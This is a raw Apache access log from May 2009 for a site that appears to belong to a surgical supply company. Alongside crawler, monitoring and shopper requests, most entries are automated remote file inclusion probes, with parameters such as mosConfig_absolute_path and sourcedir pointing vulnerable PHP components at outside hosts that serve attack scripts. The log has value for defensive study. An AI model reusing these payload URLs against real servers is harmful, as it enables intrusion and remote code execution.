72.30.79.49 - - [17/May/2009:05:30:18 -0400] "GET /images/ACE_Creditform.pdf HTTP/1.0" 200 34160 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.212.167.26 - - [17/May/2009:05:30:59 -0400] "GET /logs/access_log.Q108082000%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:30:59 -0400] "GET /logs/access_log.Q108122500%20%20//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:31:27 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 1686 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:31:27 -0400] "GET /?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:31:27 -0400] "GET /logs/error_log.Q108070200/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:31:59 -0400] "GET /logs/access_log.Q108082800//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:32:09 -0400] "GET /?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:32:13 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:32:13 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 1686 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:32:31 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:32:43 -0400] "GET /?sourcedir=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:32:47 -0400] "GET /logs/?sourcedir=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 200 1686 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:32:47 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:32:55 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:32:57 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:32:57 -0400] "GET /logs/access_log.Q108090700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:32:57 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:32:57 -0400] "GET /logs/access_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:10 -0400] "GET /logs/access_log.Q108062100/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:10 -0400] "GET /?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:10 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 1686 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:33:26 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:27 -0400] "GET /?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:27 -0400] "GET /logs/error_log.Q108070200/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:33 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:33 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 1686 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:33:42 -0400] "GET /logs/error_log.Q108070200%20%20/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:33:44 -0400] "GET /logs/access_log.Q108112400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:33:47 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:33:53 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:33:53 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:33:53 -0400] "GET /logs/access_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:33:53 -0400] "GET /logs/access_log.Q108090700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:53 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:33:54 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:34:00 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:05:34:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [17/May/2009:05:34:16 -0400] "GET /logs/access_log.Q108062100%20%20/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:05:34:47 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:05:34:48 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
123.143.98.5 - - [17/May/2009:05:34:48 -0400] "GET /logs/access_log.Q108100600%20%20/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:34:48 -0400] "GET /main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:34:48 -0400] "GET /logs/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:05:34:50 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
123.143.98.5 - - [17/May/2009:05:34:51 -0400] "GET /main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:34:51 -0400] "GET /logs/access_log.Q108100600%20%20/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:34:51 -0400] "GET /logs/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:05:35:02 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
58.227.193.198 - - [17/May/2009:05:35:13 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:35:13 -0400] "GET /logs/access_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:35:13 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:35:13 -0400] "GET /logs/access_log.Q108090700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.159.191.105 - - [17/May/2009:05:35:47 -0400] "GET /logs/access_log.Q109022600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
82.159.191.105 - - [17/May/2009:05:35:47 -0400] "GET /logs/access_log.Q108120600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:36:11 -0400] "GET /logs/error_log.Q108062100%20%20/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:36:35 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:36:35 -0400] "GET /logs/access_log.Q108111500%20%20/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:05:36:40 -0400] "GET /logs/access_log.Q108111500%20%20/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:36:45 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:36:45 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:36:45 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:36:46 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.72.114 - - [17/May/2009:05:36:50 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6074E03D2B7896003EE901C+WSEQ(S0060):1+OUITEM(A0200):04948702 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [17/May/2009:05:37:56 -0400] "GET /logs/error_log.Q107120900 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.103.144 - - [17/May/2009:05:38:21 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:38:22 -0400] "GET /logs/error_log.Q108110100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:05:38:55 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.221.119.126 - - [17/May/2009:05:38:57 -0400] "GET /logs/access_log.Q108090700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:05:38:57 -0400] "GET /logs/access_log.Q108082900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:05:39:02 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:05:39:02 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:05:39:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.241.40.51 - - [17/May/2009:05:39:11 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:39:11 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:39:11 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:05:39:21 -0400] "GET /logs/error_log.Q108092500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:39:48 -0400] "GET /logs/access_log.Q108090700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:39:48 -0400] "GET /logs/access_log.Q108082900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
67.212.167.26 - - [17/May/2009:05:40:02 -0400] "GET /logs/access_log.Q108082800//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:05:40:15 -0400] "GET /logs/access_log.Q108100700//include/print_category.php?setup[use_category]=1&dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:05:40:36 -0400] "GET /logs/access_log.Q108021100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [17/May/2009:05:40:51 -0400] "GET /logs/error_log.Q108070100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/May/2009:05:44:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.114.85.37 - - [17/May/2009:05:45:25 -0400] "GET /logs/access_log.Q108091600 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
211.241.40.51 - - [17/May/2009:05:46:39 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:05:48:53 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:49:00 -0400] "GET /logs/access_log.Q109022600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:05:49:00 -0400] "GET /logs/access_log.Q108120600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:05:49:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.136.48.144 - - [17/May/2009:05:49:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
220.136.48.144 - - [17/May/2009:05:49:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
220.136.48.144 - - [17/May/2009:05:50:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
220.136.48.144 - - [17/May/2009:05:50:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
211.241.40.51 - - [17/May/2009:05:52:25 -0400] "GET /logs/access_log.Q108100900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:05:53:44 -0400] "GET /logs/access_log.Q108090200%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:05:54:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.96.226.84 - - [17/May/2009:05:54:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:54:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:54:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:54:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
121.173.130.41 - - [17/May/2009:05:55:04 -0400] "GET //citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:55:04 -0400] "GET /logs//citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:05:55:04 -0400] "GET /logs/access_log.Q109012800//citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.152.213.84 - - [17/May/2009:05:55:19 -0400] "GET /logs/access_log.Q108100600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
203.152.213.84 - - [17/May/2009:05:55:19 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
203.152.213.84 - - [17/May/2009:05:55:20 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
121.173.130.41 - - [17/May/2009:05:55:35 -0400] "GET /logs/access_log.Q108120600//citywriter/head.php?path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.152.213.84 - - [17/May/2009:05:55:51 -0400] "GET /logs/access_log.Q108082900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
94.198.214.29 - - [17/May/2009:05:56:28 -0400] "GET //language.php?rootdir=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
86.96.226.84 - - [17/May/2009:05:56:46 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):64-000-02 HTTP/1.1" 200 38036 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:56:48 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):64-000-02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:56:48 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):64-000-02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:56:49 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):64-000-02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:56:49 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):64-000-02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:56:50 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):64-000-02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
86.96.226.84 - - [17/May/2009:05:56:50 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):64-000-02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; .NET CLR 1.1.4322; IEMB3)"
